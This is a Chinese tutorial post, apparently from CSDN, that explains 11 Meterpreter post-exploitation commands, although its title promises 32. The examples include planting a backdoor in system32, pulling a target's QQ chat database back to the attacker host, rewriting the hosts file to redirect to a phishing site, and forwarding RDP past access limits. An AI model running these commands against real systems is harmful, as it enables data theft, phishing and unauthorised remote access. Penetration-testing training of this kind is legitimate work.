仅作渗透测试技术实验之用,请勿针对任何未授权网络和设备。
1、background命令
返回,把meterpreter后台挂起
2、session命令
session 命令可以查看已经成功获取的会话
可以使用session -i 连接到指定序号的meterpreter会话已继续利用
3、shell命令
获取目标主机的远程命令行shell
如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再尝试
4、cat命令
查看目标主机上的文档内容
例如:cat C:\boot.ini 查看目标主机启动引导信息
5、getwd命令
获取系统工作的当前目录
6、upload命令
上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload setup.exe C:\windows\system32
7、download命令
把目标主机上的文件下载到我们的攻击主机上
例如:把目标主机C盘根目录下的boot.ini文件下载到攻击主机的/root/目录下
download C:\boot.ini /root/
download C:\“Program Files”\Tencent\QQ\Users\295******125\Msg2.0.db /root/
把目标主机上的QQ聊天记录下载到攻击主机的root目录下(仅实验用途,是否要考虑变更你QQ程序的安装路径了呢)
8、edit命令
调用vi编辑器,对目标主机上的文件修改
例如修改目标主机上的hosts文件,使得目标主机访问baidu时去到准备好的钓鱼网站(仅限实验用途)
9、search命令
在目标主机文件系统上查找搜索文件
例如:search -d c:\ -f *.doc
在目标主机C盘下搜索doc文档
10、ipconfig命令
这个不多说,查看目标主机上的网络参数
11、portfwd命令
端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176
把目标主机192.168.250.176的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rde
Meterpreter模块32个命令用法
最新推荐文章于 2024-07-15 14:23:16 发布
本文详细介绍了Meterpreter在渗透测试中的32个常用命令,包括background、session、shell、cat、getwd、upload、download、edit、search、ipconfig、portfwd、route、getuid、sysinfo、ps、migrate、execute、getpid、shutdown、enum_drives、checkvm、persistence、metsvc、getgui、getsystem、keyscan、hashdump、enum_applications、dumplinks、enum_ie、route、get_local_subnets、clearev等,涵盖了会话管理、系统控制、网络通信、信息收集等多个方面。
摘要由CSDN通过智能技术生成